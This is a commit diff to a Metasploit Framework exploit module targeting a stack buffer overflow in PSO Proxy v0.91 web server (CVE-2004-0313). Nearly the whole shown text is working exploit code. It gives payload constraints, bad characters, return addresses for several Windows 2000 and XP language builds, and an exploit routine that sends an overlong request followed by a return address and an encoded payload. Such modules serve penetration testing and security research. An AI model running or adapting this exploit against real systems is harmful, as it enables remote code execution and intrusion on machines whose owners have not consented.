New module from Patrick

git-svn-id: file:///home/svn/framework3/trunk@5115 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/http/psoproxy91_overflow.rb

@@ -3,7 +3,7 @@
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@@ -21,15 +21,13 @@ class Exploits::Windows::Http::PSOProxy91_Overflow < Exploit::Remote
 			'Name'           => 'PSO Proxy v0.91 Stack Overflow',
 			'Description'    => %q{
 				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
-				If a client sends an excessively long request the stack is overwritten.
-				You may need to rerun this exploit a few times before your payload is executed.
-				This module was ported from the original exploit by rave@rosiello.org.
+				If a client sends an excessively long string the stack is overwritten.
 			},
 			'Author'         => 'Patrick Webster <patrick@aushack.com>',
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
-			'References'     => 
-				[ 
+			'References'     =>
+				[
 					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
 					[ 'CVE', '2004-0313' ],
 					[ 'BID', '9706' ],
@@ -41,30 +39,35 @@ class Exploits::Windows::Http::PSOProxy91_Overflow < Exploit::Remote
 				},
 			'Payload'        =>
 				{
-					'Space'    => 350,
-					'BadChars' => "\x0a\x0d",
+					'Space'    => 370,
+					'BadChars' => "\x00\x0a\x0d\x20",
 					'StackAdjustment' => -3500,
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Windows 2000 SP4 English',
-					{
-						'Ret' => 0x7c57b842,# jmp ecx KERNEL32.DLL w2ksp4en
-					}
-					],
+				# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
+					[ 'Windows 2000 Pro SP0-4 English',  { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
+					[ 'Windows 2000 Pro SP0-4 French',   { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
+					[ 'Windows 2000 Pro SP0-4 Italian',  { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
+					[ 'Windows XP Pro SP0/1 English',    { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
+					[ 'Windows XP Pro SP2 English',	     { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'Feb 20 2004',
 			'DefaultTarget'  => 0))
 
 		register_options(
-			[ 
+			[
 				Opt::RPORT(8080),
 			], self.class)
 	end
 
-		def check 
+		def autofilter
+                false
+        end
+
+		def check
 			connect
 			sock.put("GET / HTTP/1.0\r\n\r\n")
 			banner = sock.get(-1,3)
@@ -75,13 +78,13 @@ class Exploits::Windows::Http::PSOProxy91_Overflow < Exploit::Remote
 		end
 
 		def exploit
-			print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") 
 			connect
-			exploit = rand_text_alphanumeric(1024, payload_badchars) 
-			exploit += [target['Ret']].pack('V') + make_nops(20) + payload.encoded
+
+			exploit = rand_text_alphanumeric(1024, payload_badchars)
+			exploit += [target['Ret']].pack('V') + payload.encoded
+
 			sock.put(exploit + "\r\n\r\n")
-			sleep(0.25)
-			print_status("Payload sent... if it didn't work try again!")
+
 			disconnect
 			handler
 		end